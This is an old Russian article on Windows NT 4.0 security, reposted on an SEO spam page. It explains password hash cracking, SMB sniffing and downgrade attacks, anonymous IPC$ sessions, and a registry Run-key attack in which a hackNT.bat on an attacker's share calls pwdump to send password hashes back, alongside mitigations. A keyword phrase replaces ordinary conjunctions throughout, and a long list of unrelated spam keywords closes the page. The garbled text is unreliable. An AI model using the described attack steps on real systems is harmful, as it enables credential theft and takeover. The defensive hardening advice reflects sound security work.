программа шифрование данный
Компьютерная безопасность\проблемы безопасности\безопасность компьютерных систем на базе Windows NT
проблемы безопасности:
безопасность компьютерных систем
Безопасность
компьютерных
систем на базе Windows NT
Андрей Стуленков
Windows NT предоставляет богатые
возможности конфигурирования операционной
среды, однако такая гибкость системы таит в себе
много потенциальных опасностей, в частности, для
защиты.
Windows NT получает все большее
распространение программа шифрование данный как операционная система для
рабочих станций, программа шифрование данный как серверная ОС. Многие
сетевые администраторы уже успели оценить
легкость управления этой системой и
эффективность средств ее безопасности. Однако
популярность NT заставила хакеров всего мира
обратить на нее пристальное внимание, и, конечно,
они нашли немало слабых мест.
В этой статье мы попытаемся дать
общий обзор проблем безопасности информационных
систем на базе Windows NT 4.0. При этом основное
внимание будет уделено тем методам взлома
компьютерных сетей, применение которых не
требует от злоумышленника высокой квалификации
и может быть осуществлено с помощью программных
средств, свободно доступных в Internet. Как
показывает практика, такие атаки наиболее
распространены, программа шифрование данный именно от них следует защитить
свою систему в первую очередь. К сожалению,
абсолютное большинство системных
администраторов плохо осведомлены о возможных
угрозах, поэтому для них подобная информация
будет особенно полезна.
Система безопасности
компьютерной сети должна предусматривать меры
защиты по трем направлениям:
защита на уровне физического
доступа к компьютеру;
организация безопасной работы в
локальной сети;
защита при подключении к
глобальным сетям.
Как мы надеемся, приводимые в
этой статье рекомендации помогут администратору
системы безопасности правильно оценить
возможный риск по всем трем направлениям и
сформировать необходимый в его конкретном
случае "защитный комплекс".
ЛОКАЛЬНЫЙ ДОСТУП К КОМПЬЮТЕРУ
Windows NT позволяет контролировать
локальный доступ к хранящейся на диске
информации в соответствии с разрешениями
файловой системы. Как известно, NT поддерживает
две файловые системы: FAT программа шифрование данный NTFS. FAT не имеет средств
защиты на уровне локального пользователя,
поэтому она используется, только если компьютер
имеет альтернативную операционную систему MS-DOS
или Windows 95. NTFS - новая файловая система,
поддерживаемая только ОС Windows NT. Основным ее
отличием от FAT является способность обеспечивать
защиту файлов программа шифрование данный каталогов в соответствии с
правами пользователей.
NTFS необходимо использовать
всегда, когда требуется обеспечить защиту
информации. Однако не забывайте, что разрешения
NTFS на доступ к данным не действуют в другой
операционной системе, отличной от Windows NT. Так,
например, при наличии возможности загрузить MS-DOS
с дискеты любая информация из разделов NTFS может
быть считана с помощью драйвера NTFSDOS.EXE (автор - Mark
Russinovich) в обход системы безопасности Windows NT.
Аналогичный драйвер существует программа шифрование данный для ОС Linux.
Только шифрование способно
надежно защитить информацию от подобных методов
прямого доступа к диску. К сожалению, в Windows NT 4.0 не
предусмотрена возможность шифрования на уровне
операционной системы (файловая система с этой
функцией должна появиться в следующей версии NT).
На сегодняшний день для шифрования данных вы
можете использовать несколько соответствующих
программных продуктов независимых
производителей:
SeNTry2020 (http://www.softwinter.com);
SecurityPlus (http://www.softbytelabs.com);
Cryptext (http://www.tip.net.au/~njpayne)
В соответствии с российским
законодательством, все государственные
организации, программа шифрование данный также предприятия, на которых
размещаются государственные заказы, должны
применять шифровальные средства, имеющие
сертификат Федерального агентства
правительственной связи программа шифрование данный информации при
Президенте РФ. В этом случае для шифрования
данных в среде NT вы можете использовать
сертифицированное средство криптографической
защиты информации "ВЕРБА-OW", разработанное
Пензенским научно-исследовательским
электротехническим институтом (http://www.security.ru).
Наивысшую же степень защиты
информации обеспечивают специализированные
контроллеры дисков, способные шифровать на лету
любые данные, записываемые на жесткий диск. На
отечественном рынке наибольшее распространение
получили шифрующие контроллеры дисков серии
КРИПТОН (http://www.microdin.ru/~ancud/crypton4.htm),
имеющие сертификат ФАПСИ.
Кроме доступа к хранящейся на
компьютере информации злоумышленник, как
правило, стремится получить права
администратора системы или пароли
пользователей. В этом случае наибольший интерес
для него представляет файл SAM из каталога
WINNT\System32\Config. SAM - это файл, где хранятся учетные
записи пользователей программа шифрование данный их пароли. Во время работы
Windows NT доступ к SAM имеет только администратор. Тем
не менее злоумышленник может получить копию
этого файла, загрузив с дискеты MS-DOS программа шифрование данный свободно
скопировав SAM.
Для извлечения программа шифрование данный вскрытия
текстовых паролей из SAM взломщик может
использовать одну из доступных в Internet программ,
например L0phtCrack. С целью защиты от просмотра
пароли в SAM подвергаются специальной
криптографической процедуре - хэшированию. Хэш
дополнительно шифруется с помощью алгоритма DES,
однако эта операция является обратимой, так что
значение хэшированного пароля может быть
восстановлено в любой момент. В отличие от
шифрования, хэширование - необратимая процедура,
поэтому восстановить из хэша текстовый пароль
можно только путем перебора всех возможных
комбинаций. Таким образом, время, необходимое для
вскрытия пароля, увеличивается пропорционально
длине пароля программа шифрование данный количеству используемых символов.
Windows NT поддерживает пароли длиной
до 128 символов, но на практике стандартные
программы работы с учетными записями
пользователей ограничивают длину пароля 14
символами. Может показаться, что простой перебор
всех возможных комбинаций 14-символьного пароля
требует применения сверхмощной вычислительной
техники, однако это не совсем так. Дело в том, что
в действительности файл SAM содержит два
хэшированных представления одного программа шифрование данный того же
пользовательского пароля, полученных с помощью
разных алгоритмов. Один хэш - в стандарте Windows NT,
другой - в стандарте LAN Manager (этот стандарт
используется в целях совместимости с другими
сетевыми клиентами, такими, как Windows for Workgroups и
Windows 95). Хэшированный пароль стандарта LAN Manager
слабо устойчив к взлому, так как каждая из двух
половин 14-байтового символьного пароля
хэшируется независимо, программа шифрование данный результаты затем
соединяются. Таким образом, вычисление
14-байтового пароля эквивалентно взлому двух
7-байтовых паролей, что значительно сокращает
число возможных комбинаций для перебора. По этой
причине все программы вскрытия текстовых
паролей пытаются в первую очередь подобрать
хэшированный пароль по стандарту LAN Manager. Тесты
показывают, что программа L0phtCrack, работающая на
Pentium Pro 200, может взломать пароль любой длины,
состоящий из букв программа шифрование данный цифр, примерно за одну неделю.
Для защиты базы данных SAM от взлома можно
использовать утилиту SYSKEY, входящую в состав Service
Pack 3. SYSKEY позволяет дополнительно зашифровать
данные в SAM, после чего программы извлечения и
восстановления паролей не смогут корректно
обрабатывать информацию из этого файла.
Если у злоумышленника имеется
физический доступ к вашему компьютеру и
возможность загрузки с дискеты, то он может
использовать еще один быстрый способ получения
прав администратора системы. Имеющийся в Internet
файл bootdisk.bin (автор - Petter Nordahl-Hagen) представляет
собой образ загрузочной дискеты с ОС Linux.
Загрузка с такой дискеты приводит к запуску
программы, предлагающей сменить пароль любого
пользователя операционной системы Windows NT
(включая администратора). Эта программа способна
модифицировать пароли в файле SAM как в разделе NTFS,
так программа шифрование данный в FAT. Перед сменой пароля она предлагает
сохранить старую копию SAM, которую злоумышленник
может использовать впоследствии для
восстановления первоначального пароля
администратора, чтобы нарушение системы
безопасности осталось незамеченным. Данная
атака может быть предотвращена за счет
дополнительного шифрования информации в SAM с
помощью утилиты SYSKEY.
Непривилегированный
пользователь может получить права
администратора непосредственно во время сеанса
работы в Windows NT, используя имеющиеся полномочия
на каталоги диска программа шифрование данный ключи реестра. К примеру,
каталог WINNT\REPAIR, где хранится резервная копия
системного реестра, доступен по умолчанию для
всех пользователей. Используя файл SAM из этого
каталога, взломщик способен выяснить пароли
других пользователей.
Для обеспечения высокого уровня
защиты администратору следует вручную задать
более жесткие права на объекты файловой системы
и ключи реестра. Рекомендации по созданию
безопасной конфигурации можно найти на
страничке
http://www.microsoft.com/ntserver/security/exec/overview/Secure_NTInstall.asp.
К сожалению, правильное
администрирование не всегда гарантирует
надежную защиту. Серьезную угрозу безопасности NT
могут представлять ошибки в самой операционной
системе. Так, например, широко известная
программа GetAdmin.exe (автор - Константин Соболев)
использует одну из внутренних системных
"дыр" для повышения уровня привилегий
локального пользователя программа шифрование данный включения его в группу
администраторов. Как правило, компания Microsoft
оперативно реагирует на сообщения об ошибках в
коде ОС Windows NT программа шифрование данный выпускает соответствующие
"заплаты" (Hot Fix), которые позднее включаются
в новые версии сервисных пакетов (Service Pack). В
настоящее время на Web-сервере Microsoft имеется Service
Pack 4, куда были включены все последние
исправления программа шифрование данный "заплаты" (в том числе программа шифрование данный для
противодействия GetAdmin).
Организация локальной системы
безопасности требует от администратора
комплексного подхода, включающего
предотвращение физического доступа, ограничение
прав пользователей программа шифрование данный задание надлежащих
полномочий на папки диска программа шифрование данный ключи реестра. Вот
несколько основных рекомендаций по защите
системы на базе NT от атак, связанных с локальным
доступом:
Windows NT должна быть единственной
операционной системой на вашем компьютере;
у пользователя не должно быть
возможности загрузиться с дискеты;
системный блок должен находиться
в недоступном для пользователей месте;
в качестве файловой системы
следует использовать только NTFS;
число пользователей с правом
локальной регистрации должно быть максимально
ограничено (для этого в программе UserManager в меню
Policies выберите пункт UsersRights, в списке Rights укажите
log on locally программа шифрование данный отредактируйте список разрешенных
пользователей);
при появлении новых версий
сервисных пакетов программа шифрование данный "заплат" на сервере
http://www.microsoft.com их по возможности следует тут же
устанавливать.
БЕЗОПАСНАЯ РАБОТА В ЛОКАЛЬНОЙ
СЕТИ
Одной из наиболее важных функций
локальных сетей является совместное
использование файлов программа шифрование данный печати. Windows NT
обеспечивает разделение файлов программа шифрование данный печати с
помощью двух сетевых сервисов: Workstation программа шифрование данный Server.
Служба Workstation позволяет компьютерам обращаться к
ресурсам в сети. Служба Server предназначена для
управления созданием программа шифрование данный защитой каталогов и
принтеров, программа шифрование данный также позволяет компьютеру
выполнять роль сервера, предоставляющего свои
собственные сетевые ресурсы для общего доступа.
Дистанционный доступ к сетевым ресурсам в ОС Windows
NT осуществляется по протоколу SMB (Server Message Block);
этот протокол применяется также для удаленного
управления системой. Ниже мы рассмотрим вопросы
защиты сервера SMB на базе Windows NT.
Наибольший интерес с точки
зрения безопасности представляет процесс
регистрации пользователей в сети Windows NT по
протоколу SMB. C каждым сетевым ресурсом сервера
связан список контроля доступа, поэтому любой
сеанс связи начинается с процесса регистрации
сетевого клиента программа шифрование данный проверки его прав на доступ к
запрашиваемому сетевому ресурсу. При открытии
сеанса связи сервер генерирует случайный
8-байтовый "вызов" (challenge) программа шифрование данный посылает его
клиенту. Клиент шифрует по алгоритму DES
полученный от сервера "вызов", используя в
качестве ключа шифрования 16-байтовый
хэшированный пароль из своего файла SAM.
Результатом является 24-байтовый "ответ"
(response) клиента, который программа шифрование данный передается серверу. Как
уже упоминалось, в SAM хранятся два хэшированных
пароля: хэш Windows NT программа шифрование данный хэш LAN Manager. Поэтому клиент
формирует два "ответа" общей длиной 48 байт.
Сервер в свою очередь проводит аналогичные
вычисления, используя собственный "вызов" и
хэшированный пароль пользователя из своей базы
данных SAM. Полученное в результате значение
сервер сравнивает с пришедшим от клиента
"ответом"; если они совпадают, то
регистрация заканчивается успешно (см. Рисунок 1).
Рисунок 1. Процедура
регистрации в сети.
Перед открытием сеанса связи
стороны договариваются об используемом диалекте
SMB. На этом этапе злоумышленник, имеющий доступ к
локальной сети, способен вынудить клиента
выслать пароль в открытом виде без применения
схемы "вызов-ответ". Появившаяся в Internet
программа c2myazz.exe эксплуатирует именно данное
слабое место протокола SMB. Она прослушивает
сетевой трафик программа шифрование данный в момент начала процесса
регистрации между двумя машинами высылает от
имени сервера пакет с требованием к клиенту
предоставить пароль без шифрования, после чего
открытый пароль перехватывается. Для
предотвращения подобных атак на всех
компьютерах вашей сети следует установить Service
Pack 3, запрещающий обмен паролями в открытом виде
по умолчанию.
Применяемый алгоритм сетевой
регистрации Windows NT дает злоумышленнику,
перехватившему пару "вызов-ответ",
возможность подобрать пароль пользователя.
Упоминавшаяся ранее программа L0phtCrack способна
вычислить текстовые пароли на основании
"вызова" сервера программа шифрование данный "ответа" клиента. Как
и в случае паролей из локальной базы SAM,
"ответ" по стандарту LAN Manager наименее
устойчив к взлому. В среднем подбор пароля по
этому "ответу" занимает только на 40% больше
времени, чем прямая атака на хэш LAN Manager из SAM.
Вместе с тем администратор может запретить
включение пароля LAN Manager в "ответ" клиента.
Для этого в ключе HKLM\SYSTEM\CurrentControlSet\Control\LSA параметр
LMCompatibilityLevel следует задать равным 2. Однако имейте
в виду, что отключение совместимости с LAN Manager
сделает невозможной работу сервера Windows NT с
системами, поддерживающими этот протокол (Windows 95,
Windows for Workgroups).
Обратите внимание, что при
формировании "ответа" клиентом
используется не сам текстовый пароль, программа шифрование данный только
его хэшированное представление. Поэтому, если
злоумышленнику удастся заполучить хэшированный
пароль пользователя, он сможет пройти сетевую
регистрацию, не взламывая хэш.
Итак, основные проблемы
безопасности локальной сети связаны, прежде
всего, с возможностью прослушивания сети
злоумышленником программа шифрование данный перехвата паролей. Если
локальная сеть построена на базе
широковещательного протокола, в частности, Ethernet,
то на любом компьютере сетевой адаптер может
быть переведен в режим приема всех пакетов -
promiscuous mode. Кроме того, сама Microsoft предоставила в
распоряжение пользователя прекрасное средство
прослушивания сети - Network Monitor. Многие
администраторы используют Network Monitor для поиска
неисправностей в сети, но при этом они имеют
потенциальную возможность перехватывать
передаваемую по сети конфиденциальную
информацию, например имена программа шифрование данный пароли
пользователей (см. Рисунок 2). Кроме Network Monitor
существует ряд специализированных
"анализаторов пакетов" (packet sniffer),
позволяющих автоматизировать процесс
обнаружения паролей NT в прослушиваемом сетевом
трафике. Один из таких "анализаторов" -
readsmb.exe - входит в состав L0phtCrack.
Рисунок 2. Сетевой трафик,
перехваченный программой Network Monitor.
Пакет, содержащий "вызов" сервера (вверху), и
пакет, содержащий "ответ"
клиента (внизу).
Для борьбы с
прослушиванием следует жестко
контролировать физический доступ к
сетевому кабелю, использовать
коммутаторы вместо концентраторов,
внимательно относиться к защите
маршрутизаторов. Иногда по тем или
иным причинам контроль за физическим
доступом посторонних лиц к каналам
передачи данных оказывается
невозможным. В таких случаях вы можете воспользоваться специальными шифрующими
протоколами для организации виртуального канала
между клиентом программа шифрование данный сервером в соответствии с
технологией VPN (Virtual Private Network). Информацию о
программных программа шифрование данный аппаратных реализациях
VPN-совместимых протоколов можно найти по
следующим адресам: http://www.emory.edu/BUSINESS/et/P98/vpn;
http://www.epm.ornl.gov/~dunigan/vpn.html.
Как уже было описано выше, для доступа к сетевым
ресурсам сервера клиент должен пройти процедуру
регистрации. Для этого ему необходимо знать имя и
пароль пользователя, имеющего учетную запись на
данном сервере или на контроллере домена. Однако
из этого правила есть два исключения: гостевой и
анонимный входы. Если на сервере Windows NT учетная
запись Guest не заблокирована, то любой
незарегистрированный пользователь
автоматически получает доступ к сетевым
ресурсам с правами Guest. Поэтому разрешать
гостевой вход следует с особой осторожностью. В
Windows NT 4.0 учетная запись Guest отключена по
умолчанию. Тем не менее мы рекомендуем проверить,
установлен ли флажок Disabled для этой учетной
записи в диспетчере пользователей. C помощью
сетевого сканера Legion администратор может
выявить все серверы SMB, предоставляющие свои
ресурсы для гостевого доступа
незарегистрированным пользователям.
Еще одним способом войти в
систему NT без какой-либо регистрации является
анонимный вход. Сервер открывает анонимный сеанс
SMB, когда в ответ на "вызов" клиент посылает
пакет с пустым паролем программа шифрование данный без имени пользователя.
В рамках этого сеанса клиент не получает доступа
ни к файлам, ни к принтерам, но имеет доступ к
специальному ресурсу IPC$ (Inter Process Communication). Этот
ресурс предназначен для создания именованных
каналов, которые компьютеры в сети используют
для обмена различной служебной информацией
(кроме того, именованные каналы применяются для
дистанционного управления сервером). Установить
анонимный сеанс с NT-сервером можно с помощью
следующей команды:
NET USE \\имя_сервера\IPC$
""/USER:"".
Во время анонимного сеанса
злоумышленник может удаленно подсоединиться к
системному реестру сервера с помощью программ
Regedit или Regedt32, при этом при просмотре и
модификации реестра он будет иметь права группы
Everyone.
По умолчанию NT Workstation
предоставляет анонимному пользователю доступ к
большинству ключей реестра, поэтому взломщик
может получить очень много информации о вашей
рабочей станции. Кроме того, группа Everyone имеет
права на редактирование некоторых важных
системных ключей, благодаря чему анонимный
пользователь способен не только дезорганизовать
работу операционной системы, но программа шифрование данный осуществить
полный "взлом" сервера (т. е. получить к нему
административный доступ).
Для этих целей им может быть
использован, например, ключ
HKLM\Software\Microsoft\Windows\CurrentVersion\Run. Этот ключ содержит
имена программ, автоматически запускаемых при
каждой локальной регистрации пользователя.
Указав в этом ключе нужное имя, он может
заставить атакуемую машину выполнить любую
команду. Предположим, злоумышленник прописал в
ключе Run команду
\\имя_компьютера_злоумышленника\Share\hackNT.bat. Теперь
после очередной локальной регистрации
атакованная машина попытается связаться с
компьютером злоумышленника программа шифрование данный запустить
командный файл hackNT.bat из сетевой папки Share.
Командный файл будет выполнен в контексте
безопасности того пользователя, который в данный
момент локально зарегистрировался на сервере.
Таким образом, если пользователь
зарегистрировался с правами администратора, то
hackNT.bat сможет осуществить любые действия в
системе. К примеру, вызов из hackNT.bat программы
pwdump.exe (автор - Jeremy Allison) заставит атакованный
сервер создать на компьютере злоумышленника
файл с именами программа шифрование данный хэшированными паролями
пользователей сервера. Обратите внимание, что
для осуществления данной атаки взломщику даже не
требуется иметь прав на доступ к сетевым
ресурсам сервера.
Итак, как видите, любой
злоумышленник безо всякой регистрации способен
подсоединиться к NT Workstation программа шифрование данный получить пароли
пользователей. Данный пример демонстрирует,
какую опасность может представлять анонимный
доступ программа шифрование данный насколько важна защита системного
реестра.
В Windows NT Server удаленный доступ к
реестру контролируется с помощью ключа Winreg.
Права на доступ к этому ключу определяют тех, кто
может работать с реестром. По умолчанию подобным
правом обладают только администраторы. Однако,
несмотря на ограничения, налагаемые ключом Winreg,
анонимный пользователь все же имеет доступ к
разделу .DEFAULT ветви HKEY_USERS программа шифрование данный еще к нескольким
разделам реестра, перечисленным в ключе
Winreg\AllowedPath. Поэтому злоумышленник по-прежнему
способен взломать систему путем модификации
некоторых параметров реестра.
Как видите, NT Workstation программа шифрование данный NT Server в
стандартной конфигурации уязвимы для атаки с
использованием анонимного доступа к реестру, и
взлом этих систем для хакера - лишь вопрос
времени. Лучшим решением данной проблемы
является установка на вашей машине сервисного
пакета Service Pack 3, так как он запрещает доступ к
реестру в рамках анонимного сеанса. Однако не
забывайте, что Service Pack 3 блокирует только
анонимный доступ к реестру. Любой
зарегистрированный пользователь все равно
сможет удаленно провести атаку на реестр и
получить права администратора. Для
предотвращения нежелательных действий со
стороны авторизованных пользователей
администратору следует вручную выставить более
жесткие разрешения на ключи реестра в
соответствии с рекомендациями, приведенными на
сервере Microsoft.
Итак, вы запретили гостевой вход
на свою машину, установили Service Pack 3 (или выше),
приняли все меры для предотвращения
прослушивания локальной сети. Что же может
предпринять злоумышленник против вашей системы
NT? К сожалению, возможности для удаленной атаки
все еще сохраняются.
При анонимном сетевом
подключении злоумышленник может получить список
имен всех зарегистрированных на сервере
пользователей с помощью программ USER2SID программа шифрование данный SID2USER
(автор - Е. Б. Рудный). После этого он может
предпринять попытку угадать пароль. В Internet
имеется несколько программ, с помощью которых
злоумышленник может попытаться
зарегистрироваться на сервере SMB, перебирая
пароли по словарю. Такие атаки обычно занимают
очень много времени программа шифрование данный могут быть успешными
только в случае слабых паролей.
Для предотвращения подобных атак
по методу грубой силы пароли следует задавать
длиной не менее 8 символов, при этом они должны
представлять собой случайную комбинацию букв и
цифр. Кроме того, администратор должен ввести
обязательный аудит неудачных попыток
регистрации (в программе UserManager в меню Policies
выберите пункт Audit, в диалоговом окне Audit Policy
установите флаг Logon and Logoff). Кроме того, желательно
перечислить всех пользователей программа шифрование данный группы, которым
разрешен доступ к вашему компьютеру по сети (в
программе UserManager в меню Policies выберите пункт
UsersRights, в списке Rights укажите Access this computer from network и
отредактируйте список разрешенных
пользователей).
Соблюдение приведенных
рекомендаций позволит надежно защитить сервер SMB
на базе Windows NT от попыток несанкционированного
проникновения. Но имейте в виду, что службы
разделения сетевых ресурсов предоставляют
слишком много возможностей для злоумышленника,
поэтому число пользователей, имеющих сетевой
доступ к системным ресурсам, следует максимально
ограничить.
ЗАЩИТА ПРИ РАБОТЕ С INTERNET
При подключении к Internet
информационные ресурсы локальной сети
становятся доступными огромному
неконтролируемому сообществу, поэтому
администратор должен найти способ жестко
ограничить спектр допустимых для внешнего
пользователя действий.
Теоретически все сетевые службы
вашей системы, рассчитанные на работу поверх
транспортного протокола TCP/IP, могут быть
использованы при вторжении извне. По умолчанию в
Windows NT никакие специальные Internet-сервисы не
устанавливаются. Входящий в дистрибутив NT Server 4.0
сервер Internet Information Server (IIS) 2.0 предлагает три
основные службы: WWW, FTP программа шифрование данный Gopher. Однако безопасность
IIS программа шифрование данный других Internet-сервисов, которые могут быть
установлены на вашей машине, выходит за рамки
данной статьи. Здесь мы рассмотрим только
подключение к Internet частных сетей, когда
предоставление каких-либо информационных
ресурсов внешнему миру не планируется, программа шифрование данный цель
соединения с глобальной сетью состоит в
организации безопасного доступа локальных
пользователей к ресурсам Internet.
Прежде чем предпринимать
какие-либо действия по защите системы,
администратору следует просканировать
локальную сеть на наличие открытых TCP/UDP-портов.
По номерам этих портов он сможет легко
определить, какие внутренние сетевые службы
могут быть доступны извне.
Как правило, в системе NT открыты
порты 137/UDP, 138/UDP программа шифрование данный 139/TCP, все они используются
службами NBT (NetBIOS over TCP/IP). Для разделения ресурсов
в сетях Windows серверы SMB используют программный
сетевой интерфейс NetBIOS. Доступ извне к сервисам NBT
должен быть запрещен в первую очередь, так как в
противном случае ваша система будет уязвима ко
всем тем видам SMB-атак, которые мы описали в
предыдущем разделе. Кроме портов NBT на
компьютерах с ОС Windows NT по умолчанию открыт порт
135/TCP, используемый для удаленного вызова
процедур (RPC). Его также следует закрыть для
внешних пользователей.
Любую автономную систему NT можно
защитить от внешних атак, запретив работу
интерфейса NetBIOS поверх протокола TCP/IP. Для этого в
Control Panel выберите значок Network программа шифрование данный во вкладке Binding
уберите связь между NetBIOS программа шифрование данный TCP/IP. После этого
сервисы SMB не смогут работать по протоколу TCP/IP и,
следовательно, не будут доступны из Internet. Если вы
вообще не собираетесь предоставлять ресурсы
системы для сетевого доступа, то проще всего
удалить сервис Server из вкладки Services. Наиболее
полной защиты можно добиться посредством
запрета входящих соединений TCP программа шифрование данный UDP. Для этого в
окне Properties протокола TCP/IP щелкните на кнопке Advanced,
установите опцию Enable Security, щелкните на кнопке
Configure программа шифрование данный выставите необходимые значения в окне TCP/IP
Security. После запрета входящих соединений вы
сможете, как программа шифрование данный прежде, пользоваться всеми
информационными ресурсами Internet, однако взломщик
уже не будет способен инициировать соединение с
вашей системой.
При подключении частной сети к
Internet необходимо использовать брандмауэр.
Брандмауэр как минимум обеспечивает фильтрацию
нежелательного трафика между Internet программа шифрование данный вашей
частной сетью, например, сообщений, которыми
обмениваются два компьютера в этой сети.
Перечисленные базовые функции брандмауэра
способно выполнять большинство выделенных
маршрутизаторов. Кроме того, брандмауэр должен
блокировать весь трафик с Internet через 135/TCP-, 137/UDP-,
138/UDP- программа шифрование данный 139/TCP-порты. Это предотвратит прямые атаки
извне с помощью NetBIOS программа шифрование данный RPC.
Хотя фильтрация пакетов
обеспечивает базовую защиту, значительная часть
вашей внутренней сети продолжает оставаться
видимой для внешнего мира. Один из методов
решения этой проблемы - введение уполномоченного
сервера (proxy server). Все взаимодействие с Internet
осуществляется через уполномоченный сервер, а
адреса внутренней сети будут недоступны извне и
защищены от непосредственной атаки. Вместо того
чтобы общаться напрямую, например, с Web-сервером в
Internet, пользователи вашей сети будут
взаимодействовать с уполномоченным сервером, а
тот в свою очередь пересылать их запросы на
сервер Internet. Для Internet ваша сеть будет выглядеть
как единственный пользователь Web с одним
IP-адресом. Уполномоченный сервер обеспечивает
большую защищенность внутренней сети по
сравнению с брандмауэром.
Список доступных на сегодняшний
день уполномоченных серверов программа шифрование данный брандмауэров
можно найти по следующему адресу: http://www.yahoo.com/Business_and_Economy/Companies/
Computers/Security/Software/Firewalls.
НАСТРОЙКА СИСТЕМЫ БЕЗОПАСНОСТИ
NT
По умолчанию система
безопасности Windows NT 4.0 чрезвычайно слаба программа шифрование данный легко
поддается взлому. Вместе с тем NT предоставляет
пользователю большой набор средств для создания
надежной конфигурации программа шифрование данный обеспечения
необходимого уровня защиты.
Прежде чем приступать к
разработке мер безопасности, администратору
следует выявить все слабые места компьютерной
сети с точки зрения нарушения
конфиденциальности информации и
проанализировать, какие опасения реальны, а
какие не имеют под собой почвы. Чтобы правильно
оценить степень риска, необходимо изучить список
всех известных опасных ситуаций программа шифрование данный средств,
которыми пользуются злоумышленники. Приведенные
в этой статье описания атак на базе системы NT
помогут, как мы надеемся, определить
потенциальные источники вторжения программа шифрование данный разработать
превентивные методы защиты.
Андрей Стуленков - консультант по
сетевым технологиям программа шифрование данный информационной
безопасности. С ним можно связаться через Internet по
адресу: andrewstl@hotmail.com.
домой
оглавление
Исходя из безусловного права личности на собственную
безопасность всем предоставляется право
свободного копирования, распространения программа шифрование данный издания этих материалов, как в полном объеме,
так программа шифрование данный по частям в любых комбинациях!
разделы
травертин
man гильза
изготовление презентация
брэнд
кулер процессор
рак пищевод
градирня вентиляторные грд
конкурентный стратегия
поставка тройник
изготовление пленка
man гильза
получение выписка егрп
certification microsoft
охота пиранья
нестандартный коробка
легранд
тонирование авто
мультиметры цифровой
китайский махровый
апгрейд обезьяна
контакт контактор
узи тошиба
зеркало babyliss
листогибы
растворитель
антенна
промальп
изготовление краска
перевод итальянский
гостинницы спб
измерительный комплекс к2-79
пп-пленка
напыление ппу
аденома
мистер бин
бак накопитель
лечение головокружение
измеритель петля фаза нуль
пазл
серверные корпус консольный переключатель
купить k800i
газонокосилка black decker
нейминг
вакансия красноярск
кулер комп
беременность род
листогибы
рак щитовидный железа
слюдопластовые втулка
решетка
нард скачать бесплатный
катушка контактор
три цвета: синий
дружкова кружка
александр вертинский. желтый танго
рассылка
лад
фосфорицирующая краска
персонализация карта
вагонка половой доска
лечение слух
радиодоступ
кулер процессор
tognana фарфор
снегоуборочный машина
теплолюкс
кристофер брэнд
dhl
soflens comfort
аэрография
врач-гинеколог
вкус цвет
вагонка половой доска
электрокардиограф
оформление свадеб
сэндвич кофе-бар
схема зал вахтангова
крутой xxx видео
shell
стеклянный перегородка
квн съемка
решетка дренажный
сдать анализ кровь
долг
билет russia music awards
юр.адрес
решетка оцинкованный
трехфазный электросчетчик
решетка оцинкованный
мелованный бумага
лечение головокружение
квн съемка
маркировочная краска
промышленый альпинизм
isdn видеоконференция
купить конденсатоотвод
решетка оцинкованный
акриловый пряжа
выставочный витрина
видеослот
электрический прочность
редизайн кострома
спецобувь заказ
пленка пэ
тонировка
набор гинекологический
вал редуктор поворот
стимулирующий лотерея
шелкография
ariston опт
mobihel краска
программа шифрование данный